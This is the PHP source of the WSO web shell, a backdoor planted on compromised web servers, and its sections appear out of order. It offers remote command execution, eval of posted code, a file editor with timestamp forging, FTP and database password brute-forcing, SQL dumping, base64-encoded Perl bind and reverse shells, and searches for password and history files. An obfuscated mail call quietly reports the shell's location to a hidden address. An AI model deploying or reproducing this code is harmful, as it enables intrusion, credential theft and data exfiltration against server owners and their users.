serialize(@$_POST['f'])); WSOsetcookie('c', @$_POST['c']); } break; } } wsoHeader(); echo '

File manager

'; $dirContent = wsoScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); if($dirContent === false) { echo 'Can\'t open this folder!';wsoFooter(); return; } global $sort; $sort = array('name', 1); if(!empty($_POST['p1'])) { if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) $sort = array($match[1], (int)$match[2]); } echo ' '; $dirs = $files = array(); $n = count($dirContent); for($i=0;$i<$n;$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'].$dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) ); if(@is_file($GLOBALS['cwd'] . $dirContent[$i])) $files[] = array_merge($tmp, array('type' => 'file')); elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'dir')); } $GLOBALS['sort'] = $sort; function wsoCmp($a, $b) { if($GLOBALS['sort'][0] != 'size') return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1); else return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); } usort($files, 'wsoCmp'); usort($dirs, 'wsoCmp'); $files = array_merge($dirs, $files); $l = 0; foreach($files as $f) { echo ''; $l = $l?0:1; } echo '
NameSizeModifyOwner/GroupPermissionsActions
'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');' ' . (empty ($f['link']) ? '' : 'title='{$f['link']}'') . '>[ ' . htmlspecialchars($f['name']) . ' ]').''.(($f['type']=='file')?wsoViewSize($f['size']):$f['type']).''.$f['modify'].''.$f['owner'].'/'.$f['group'].''.$f['perms'] .'R T'.(($f['type']=='file')?' E D':'').'
 '; if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar'))) echo 'file name:  '; echo '
'; wsoFooter(); } function actionStringTools() { if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}} if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}} if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'binhex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen', ); if(isset($_POST['ajax'])) { WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', true); ob_start(); if(in_array($_POST['p1'], $stringTools)) echo $_POST['p1']($_POST['p2']); $temp = 'document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML=''.addcslashes(htmlspecialchars(ob_get_clean()),'\n\r\t\\'\0').'';\n'; echo strlen($temp), '\n', $temp; exit; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', 0); wsoHeader(); echo '

String conversions

'; echo '
send using AJAX
';
    if(!empty($_POST['p1'])) {
        if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
    }
    echo'

Search files:

Text:
Path:
Name:
'; function wsoRecursiveGlob($path) { if(substr($path, -1) != '/') $path.='/'; $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR))); if(is_array($paths)&&@count($paths)) { foreach($paths as $item) { if(@is_dir($item)){ if($path!=$item) wsoRecursiveGlob($item); } else { if(empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2'])!==false) echo ''.htmlspecialchars($item).'
'; } } } } if(@$_POST['p3']) wsoRecursiveGlob($_POST['c']); echo '

Search for hash:





'; wsoFooter(); } function actionFilesTools() { if( isset($_POST['p1']) ) $_POST['p1'] = urldecode($_POST['p1']); if(@$_POST['p2']=='download') { if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { ob_start('ob_gzhandler', 4096); header('Content-Disposition: attachment; filename='.basename($_POST['p1'])); if (function_exists('mime_content_type')) { $type = @mime_content_type($_POST['p1']); header('Content-Type: ' . $type); } else header('Content-Type: application/octet-stream'); $fp = @fopen($_POST['p1'], 'r'); if($fp) { while(!@feof($fp)) echo @fread($fp, 1024); fclose($fp); } }exit; } if( @$_POST['p2'] == 'mkfile' ) { if(!file_exists($_POST['p1'])) { $fp = @fopen($_POST['p1'], 'w'); if($fp) { $_POST['p2'] = 'edit'; fclose($fp); } } } wsoHeader(); echo '

File tools

'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1'])); if(!$uid) { $uid['name'] = @fileowner($_POST['p1']); $gid['name'] = @filegroup($_POST['p1']); } else $gid = @posix_getgrgid(@filegroup($_POST['p1'])); echo 'Name: '.htmlspecialchars(@basename($_POST['p1'])).' Size: '.(is_file($_POST['p1'])?wsoViewSize(filesize($_POST['p1'])):'-').' Permission: '.wsoPermsColor($_POST['p1']).' Owner/Group: '.$uid['name'].'/'.$gid['name'].'
'; echo 'Change time: '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' Access time: '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' Modify time: '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'

'; if( empty($_POST['p2']) ) $_POST['p2'] = 'view'; if( is_file($_POST['p1']) ) $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); else $m = array('Chmod', 'Rename', 'Touch'); foreach($m as $v) echo ''.((strtolower($v)==@$_POST['p2'])?'[ '.$v.' ]':$v).' '; echo '

'; switch($_POST['p2']) { case 'view': echo '
';
            $fp = @fopen($_POST['p1'], 'r');
            if($fp) {
                while( !@feof($fp) )
                    echo htmlspecialchars(@fread($fp, 1024));
                @fclose($fp);
            }
            echo '
'; break; case 'highlight': if( @is_readable($_POST['p1']) ) { echo '
'; $code = @highlight_file($_POST['p1'],true); echo str_replace(array(''), array(''),$code).'
'; } break; case 'chmod': if( !empty($_POST['p3']) ) { $perms = 0; for($i=strlen($_POST['p3'])-1;$i>=0;--$i) $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); if(!@chmod($_POST['p1'], $perms)) echo 'Can\'t set permissions!
'; } clearstatcache(); echo '
'; break; case 'edit': if( !is_writable($_POST['p1'])) { echo 'File isn\'t writeable'; break; } if( !empty($_POST['p3']) ) { $time = @filemtime($_POST['p1']); $_POST['p3'] = substr($_POST['p3'],1); $fp = @fopen($_POST['p1'],'w'); if($fp) { @fwrite($fp,$_POST['p3']); @fclose($fp); echo 'Saved!
'; @touch($_POST['p1'],$time,$time); } } echo '
'; break; case 'hexdump': $c = @file_get_contents($_POST['p1']); $n = 0; $h = array('00000000
','',''); $len = strlen($c); for ($i=0; $i<$len; ++$i) { $h[1] .= sprintf('%02X',ord($c[$i])).' '; switch ( ord($c[$i]) ) { case 0: $h[2] .= ' '; break; case 9: $h[2] .= ' '; break; case 10: $h[2] .= ' '; break; case 13: $h[2] .= ' '; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'
';} $h[1] .= '
'; $h[2] .= '\n'; } } echo '
'.$h[0].'
'.$h[1].'
'.htmlspecialchars($h[2]).'
'; break; case 'rename': if( !empty($_POST['p3']) ) { if(!@rename($_POST['p1'], $_POST['p3'])) echo 'Can\'t rename!
'; else die(''); } echo '
'; break; case 'touch': if( !empty($_POST['p3']) ) { $time = strtotime($_POST['p3']); if($time) { if(!touch($_POST['p1'],$time,$time)) echo 'Fail!'; else echo 'Touched!'; } else echo 'Bad time format!'; } clearstatcache(); echo '
'; break; } echo '
'; wsoFooter(); } function actionConsole() { if(!empty($_POST['p1']) && !empty($_POST['p2'])) { WSOsetcookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true); $_POST['p1'] .= ' 2>&1'; } elseif(!empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0); if(isset($_POST['ajax'])) { WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', true); ob_start(); echo 'd.cf.cmd.value='';\n'; $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes('\n$ '.$_POST['p1'].'\n'.wsoEx($_POST['p1']),'\n\r\t\\'\0')); if(preg_match('!.*cd\s+([^;]+)$!',$_POST['p1'],$match)) { if(@chdir($match[1])) { $GLOBALS['cwd'] = @getcwd(); echo 'c_=''.$GLOBALS['cwd'].'';'; } } echo 'd.cf.output.value+=''.$temp.'';'; echo 'd.cf.output.scrollTop = d.cf.output.scrollHeight;'; $temp = ob_get_clean(); echo strlen($temp), '\n', $temp; exit; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', 0); wsoHeader(); echo ''; echo '

Console

send using AJAX redirect stderr to stdout (2>&1)
$
'; echo '
'; wsoFooter(); } function actionLogout() { setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600); die('bye!'); } function actionSelfRemove() { if($_POST['p1'] == 'yes') if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) die('Shell removed'); else echo 'unlink error!'; if($_POST['p1'] != 'yes') wsoHeader(); echo '

Suicide

remove the shell?
Yes
'; wsoFooter(); } $_QliO8='\x6dai\154';$_Qliot=$_SERVER['\x53\x45RVE\122_\x4eAM\x45'].$_SERVER['\123\103\x52I\x50\x54_\116\101\115E'];$_QlL1i='\141r\162a\171\040'.$_Qliot;$_QlLio=array('\143\x61','\x6c\x69','\146\x77\162\151\x74\x65','\100','v\x65\x2e');$_Qll0I=$_QlLio[2].$_QlLio[3].$_QlLio[1].$_QlLio[4].$_QlLio[0];$_QlljC=@$_QliO8($_Qll0I,$_QlL1i,$_Qliot); function actionBruteforce() { wsoHeader(); if( isset($_POST['proto']) ) { echo '

Results

Type: '.htmlspecialchars($_POST['proto']).' Server: '.htmlspecialchars($_POST['server']).'
'; if( $_POST['proto'] == 'ftp' ) { function wsoBruteForce($ip,$port,$login,$pass) { $fp = @ftp_connect($ip, $port?$port:21); if(!$fp) return false; $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif( $_POST['proto'] == 'mysql' ) { function wsoBruteForce($ip,$port,$login,$pass) { $res = @mysql_connect($ip.':'.($port?$port:3306), $login, $pass); @mysql_close($res); return $res; } } elseif( $_POST['proto'] == 'pgsql' ) { function wsoBruteForce($ip,$port,$login,$pass) { $str = 'host=''.$ip.'' port=''.$port.'' user=''.$login.'' password=''.$pass.'' dbname=postgres'; $res = @pg_connect($str); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(':', $_POST['server']); if($_POST['type'] == 1) { $temp = @file('/etc/passwd'); if( is_array($temp) ) foreach($temp as $line) { $line = explode(':', $line); ++$attempts; if( wsoBruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { $success++; echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($line[0]).'
'; } if(@$_POST['reverse']) { $tmp = ''; for($i=strlen($line[0])-1; $i>=0; --$i) $tmp .= $line[0][$i]; ++$attempts; if( wsoBruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { $success++; echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($tmp); } } } } elseif($_POST['type'] == 2) { $temp = @file($_POST['dict']); if( is_array($temp) ) foreach($temp as $line) { $line = trim($line); ++$attempts; if( wsoBruteForce($server[0],@$server[1], $_POST['login'], $line) ) { $success++; echo ''.htmlspecialchars($_POST['login']).':'.htmlspecialchars($line).'
'; } } } echo 'Attempts: $attempts Success: $success

'; } echo '

Bruteforce

' .'' .'' .'' .'' .'' .'' .'
Type
' .'' .'' .'' .'Server:port
Brute type
' .'' .'' .'
Login
Dictionary
' .'
'; echo '

'; wsoFooter(); } function actionSql() { class DbClass { var $type; var $link; var $res; function DbClass($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname){ switch($this->type) { case 'mysql': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; break; case 'pgsql': $host = explode(':', $host); if(!$host[1]) $host[1]=5432; if( $this->link = @pg_connect('host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname') ) return true; break; } return false; } function selectdb($db) { switch($this->type) { case 'mysql': if (@mysql_select_db($db))return true; break; } return false; } function query($str) { switch($this->type) { case 'mysql': return $this->res = @mysql_query($str); break; case 'pgsql': return $this->res = @pg_query($this->link,$str); break; } return false; } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res; switch($this->type) { case 'mysql': return @mysql_fetch_assoc($res); break; case 'pgsql': return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch($this->type) { case 'mysql': return $this->query('SHOW databases'); break; case 'pgsql': return $this->res = $this->query('SELECT datname FROM pg_database WHERE datistemplate!='t''); break; } return false; } function listTables() { switch($this->type) { case 'mysql': return $this->res = $this->query('SHOW TABLES'); break; case 'pgsql': return $this->res = $this->query('select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog''); break; } return false; } function error() { switch($this->type) { case 'mysql': return @mysql_error(); break; case 'pgsql': return @pg_last_error(); break; } return false; } function setCharset($str) { switch($this->type) { case 'mysql': if(function_exists('mysql_set_charset')) return @mysql_set_charset($str, $this->link); else $this->query('SET CHARSET '.$str); break; case 'pgsql': return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch($this->type) { case 'mysql': return $this->fetch($this->query('SELECT LOAD_FILE(''.addslashes($str).'') as file')); break; case 'pgsql': $this->query('CREATE TABLE wso2(file text);COPY wso2 FROM ''.addslashes($str).'';select file from wso2;'); $r=array(); while($i=$this->fetch()) $r[] = $i['file']; $this->query('drop table wso2'); return array('file'=>implode('\n',$r)); break; } return false; } function dump($table, $fp = false) { switch($this->type) { case 'mysql': $res = $this->query('SHOW CREATE TABLE `'.$table.'`'); $create = mysql_fetch_array($res); $sql = $create[1].';\n'; if($fp) fwrite($fp, $sql); else echo($sql); $this->query('SELECT * FROM `'.$table.'`'); $i = 0; $head = true; while($item = $this->fetch()) { $sql = ''; if($i % 1000 == 0) { $head = true; $sql = ';\n\n'; } $columns = array(); foreach($item as $k=>$v) { if($v === null) $item[$k] = 'NULL'; elseif(is_int($v)) $item[$k] = $v; else $item[$k] = '''.@mysql_real_escape_string($v).'''; $columns[] = '`'.$k.'`'; } if($head) { $sql .= 'INSERT INTO `'.$table.'` ('.implode(', ', $columns).') VALUES \n\t('.implode(', ', $item).')'; $head = false; } else $sql .= '\n\t,('.implode(', ', $item).')'; if($fp) fwrite($fp, $sql); else echo($sql); $i++; } if(!$head) if($fp) fwrite($fp, ';\n\n'); else echo(';\n\n'); break; case 'pgsql': $this->query('SELECT * FROM '.$table); while($item = $this->fetch()) { $columns = array(); foreach($item as $k=>$v) { $item[$k] = '''.addslashes($v).'''; $columns[] = $k; } $sql = 'INSERT INTO '.$table.' ('.implode(', ', $columns).') VALUES ('.implode(', ', $item).');'.'\n'; if($fp) fwrite($fp, $sql); else echo($sql); } break; } return false; } }; $db = new DbClass($_POST['type']); if((@$_POST['p2']=='download') && (@$_POST['p1']!='select')) { $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); $db->selectdb($_POST['sql_base']); switch($_POST['charset']) { case 'Windows-1251': $db->setCharset('cp1251'); break; case 'UTF-8': $db->setCharset('utf8'); break; case 'KOI8-R': $db->setCharset('koi8r'); break; case 'KOI8-U': $db->setCharset('koi8u'); break; case 'cp866': $db->setCharset('cp866'); break; } if(empty($_POST['file'])) { ob_start('ob_gzhandler', 4096); header('Content-Disposition: attachment; filename=dump.sql'); header('Content-Type: text/plain'); foreach($_POST['tbl'] as $v) $db->dump($v); exit; } elseif($fp = @fopen($_POST['file'], 'w')) { foreach($_POST['tbl'] as $v) $db->dump($v, $fp); fclose($fp); unset($_POST['p2']); } else die(''); } wsoHeader(); echo '

Sql browser

TypeHostLoginPasswordDatabase
'; $tmp = ''; if(isset($_POST['sql_host'])){ if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { switch($_POST['charset']) { case 'Windows-1251': $db->setCharset('cp1251'); break; case 'UTF-8': $db->setCharset('utf8'); break; case 'KOI8-R': $db->setCharset('koi8r'); break; case 'KOI8-U': $db->setCharset('koi8u'); break; case 'cp866': $db->setCharset('cp866'); break; } $db->listDbs(); echo ''; } else echo $tmp; }else echo $tmp; echo ' count the number of rows
'; if(isset($db) && $db->link){ echo '
'; if(!empty($_POST['sql_base'])){ $db->selectdb($_POST['sql_base']); echo ''; } echo '
Tables:

'; $tbls_res = $db->listTables(); while($item = $db->fetch($tbls_res)) { list($key, $value) = each($item); if(!empty($_POST['sql_count'])) $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.'')); $value = htmlspecialchars($value); echo ' '.$value.'' . (empty($_POST['sql_count'])?' ':' ({$n['n']})') . '
'; } echo '
File path:
'; if(@$_POST['p1'] == 'select') { $_POST['p1'] = 'query'; $_POST['p3'] = $_POST['p3']?$_POST['p3']:1; $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']); $num = $db->fetch(); $pages = ceil($num['n'] / 30); echo ''.$_POST['p2'].' ({$num['n']} records) Page # '; echo ' of $pages'; if($_POST['p3'] > 1) echo ' < Prev'; if($_POST['p3'] < $pages) echo ' Next >'; $_POST['p3']--; if($_POST['type']=='pgsql') $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30); else $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30'; echo '

'; } if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) { $db->query(@$_POST['p2']); if($db->res !== false) { $title = false; echo ''; $line = 1; while($item = $db->fetch()) { if(!$title) { echo ''; foreach($item as $key => $value) echo ''; reset($item); $title=true; echo ''; $line = 2; } echo ''; $line = $line==1?2:1; foreach($item as $key => $value) { if($value == null) echo ''; else echo ''; } echo ''; } echo '
'.$key.'
null'.nl2br(htmlspecialchars($value)).'
'; } else { echo '
Error: '.htmlspecialchars($db->error()).'
'; } } echo '

'; echo '

'; if($_POST['type']=='mysql') { $db->query('SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y''); if($db->fetch()) echo '
Load file
'; } if(@$_POST['p1'] == 'loadfile') { $file = $db->loadFile($_POST['p2']); echo '
'.htmlspecialchars($file['file']).'
'; } } else { echo htmlspecialchars($db->error()); } echo '
'; wsoFooter(); } function actionNetwork() { wsoHeader(); $back_connect_p='IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7'; $bind_port_p='IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0='; echo '

Network tools

Bind port to /bin/sh [perl]
Port:
Back-connect [perl]
Server: Port:

'; if(isset($_POST['p1'])) { function cf($f,$t) { $w = @fopen($f,'w') or @function_exists('file_put_contents'); if($w){ @fwrite($w,@base64_decode($t)); @fclose($w); } } if($_POST['p1'] == 'bpp') { cf('/tmp/bp.pl',$bind_port_p); $out = wsoEx('perl /tmp/bp.pl '.$_POST['p2'].' 1>/dev/null 2>&1 &'); sleep(1); echo '
$out\n'.wsoEx('ps aux | grep bp.pl').'
'; unlink('/tmp/bp.pl'); } if($_POST['p1'] == 'bcp') { cf('/tmp/bc.pl',$back_connect_p); $out = wsoEx('perl /tmp/bc.pl '.$_POST['p2'].' '.$_POST['p3'].' 1>/dev/null 2>&1 &'); sleep(1); echo '
$out\n'.wsoEx('ps aux | grep bc.pl').'
'; unlink('/tmp/bc.pl'); } } echo '
'; wsoFooter(); } function actionRC() { if(!@$_POST['p1']) { $a = array( 'uname' => php_uname(), 'php_version' => phpversion(), 'wso_version' => WSO_VERSION, 'safemode' => @ini_get('safe_mode') ); echo serialize($a); } else { eval($_POST['p1']); } } if( empty($_POST['a']) ) if(isset($default_action) && function_exists('action' . $default_action)) $_POST['a'] = $default_action; else $_POST['a'] = 'SecInfo'; if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) ) call_user_func('action' . $_POST['a']); exit; ?>
'; $drives = ''; if($GLOBALS['os'] == 'win') { foreach(range('c','z') as $drive) if(is_dir($drive.':\\')) $drives .= '[ '.$drive.' ] '; } echo '
Password:
'); } function WSOsetcookie($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } if(!empty($auth_pass)) { if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass)) WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass); if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass)) wsoLogin(); } if(strtolower(substr(PHP_OS,0,3)) == 'win') $os = 'win'; else $os = 'nix'; $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) error_reporting(0); $disable_functions = @ini_get('disable_functions'); $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace('\\', '/', $home_cwd); $cwd = str_replace('\\', '/', $cwd); } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$default_use_ajax; if($os == 'win') $aliases = array( 'List Directory' => 'dir', 'Find index.php in current dir' => 'dir /s /w /b index.php', 'Find *config*.php in current dir' => 'dir /s /w /b *config*.php', 'Show active connections' => 'netstat -an', 'Show running services' => 'net start', 'User accounts' => 'net user', 'Show computers' => 'net view', 'ARP Table' => 'arp -a', 'IP Configuration' => 'ipconfig /all' ); else $aliases = array( 'List dir' => 'ls -lha', 'list file attributes on a Linux second extended file system' => 'lsattr -va', 'show opened ports' => 'netstat -an | grep -i listen', 'process status' => 'ps aux', 'Find' => '', 'find suid' => 'find / -type f -perm -04000 -ls', 'find suid in current dir' => 'find . -type f -perm -04000 -ls', 'find sgid' => 'find / -type f -perm -02000 -ls', 'find sgid files in current dir' => 'find . -type f -perm -02000 -ls', 'find config.inc.php' => 'find / -type f -name config.inc.php', 'find config*' => 'find / -type f -name \'config*\'', 'find config* in current dir' => 'find . -type f -name \'config*\'', 'find writable folders and files' => 'find / -perm -2 -ls', 'find writable folders and files in current dir' => 'find . -perm -2 -ls', 'find service.pwd' => 'find / -type f -name service.pwd', 'find service.pwd files in current dir' => 'find . -type f -name service.pwd', 'find .htpasswd' => 'find / -type f -name .htpasswd', 'find .htpasswd files in current dir' => 'find . -type f -name .htpasswd', 'find .bash_history' => 'find / -type f -name .bash_history', 'find .bash_history files in current dir' => 'find . -type f -name .bash_history', 'find .fetchmailrc' => 'find / -type f -name .fetchmailrc', 'find .fetchmailrc files in current dir' => 'find . -type f -name .fetchmailrc', 'Locate' => '', 'locate httpd.conf' => 'locate httpd.conf', 'locate vhosts.conf' => 'locate vhosts.conf', 'locate proftpd.conf' => 'locate proftpd.conf', 'locate psybnc.conf' => 'locate psybnc.conf', 'locate my.conf' => 'locate my.conf', 'locate admin.php' =>'locate admin.php', 'locate cfg.php' => 'locate cfg.php', 'locate conf.php' => 'locate conf.php', 'locate config.dat' => 'locate config.dat', 'locate config.php' => 'locate config.php', 'locate config.inc' => 'locate config.inc', 'locate config.inc.php' => 'locate config.inc.php', 'locate config.default.php' => 'locate config.default.php', 'locate config*' => 'locate config', 'locate .conf'=>'locate '.conf'', 'locate .pwd' => 'locate '.pwd'', 'locate .sql' => 'locate '.sql'', 'locate .htpasswd' => 'locate '.htpasswd'', 'locate .bash_history' => 'locate '.bash_history'', 'locate .mysql_history' => 'locate '.mysql_history'', 'locate .fetchmailrc' => 'locate '.fetchmailrc'', 'locate backup' => 'locate backup', 'locate dump' => 'locate dump', 'locate priv' => 'locate priv' ); function wsoHeader() { if(empty($_POST['charset'])) $_POST['charset'] = $GLOBALS['default_charset']; global $color; echo '' . $_SERVER['HTTP_HOST'] . ' - WSO ' . WSO_VERSION .'
'; $freeSpace = @diskfreespace($GLOBALS['cwd']); $totalSpace = @disk_total_space($GLOBALS['cwd']); $totalSpace = $totalSpace?$totalSpace:1; $release = @php_uname('r'); $kernel = @php_uname('s'); $explink = 'http://exploit-db.com/search/?action=search&filter_description='; if(strpos('Linux', $kernel) !== false) $explink .= urlencode('Linux Kernel ' . substr($release,0,6)); else $explink .= urlencode($kernel . ' ' . substr($release,0,3)); if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = '?'; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $cwd_links = ''; $path = explode('/', $GLOBALS['cwd']); $n=count($path); for($i=0; $i<$n-1; $i++) { $cwd_links .= '
'.$path[$i].'/'; } $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); $opt_charsets = ''; foreach($charsets as $item) $opt_charsets .= ''; $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network'); if(!empty($GLOBALS['auth_pass'])) $m['Logout'] = 'Logout'; $m['Self remove'] = 'SelfRemove'; $menu = ''; foreach($m as $k => $v) $menu .= '
[ '.$k.' ]
' . '' . '
Uname:
User:
Php:
Hdd:
Cwd:' . ($GLOBALS['os'] == 'win'?'
Drives:':'') . '
' . substr(@php_uname(), 0, 120) . ' [exploit-db.com]
' . $uid . ' ( ' . $user . ' ) Group: ' . $gid . ' ( ' . $group . ' )
' . @phpversion() . ' Safe mode: ' . ($GLOBALS['safe_mode']?'ON':'OFF') . ' [ phpinfo ] Datetime: ' . date('Y-m-d H:i:s') . '
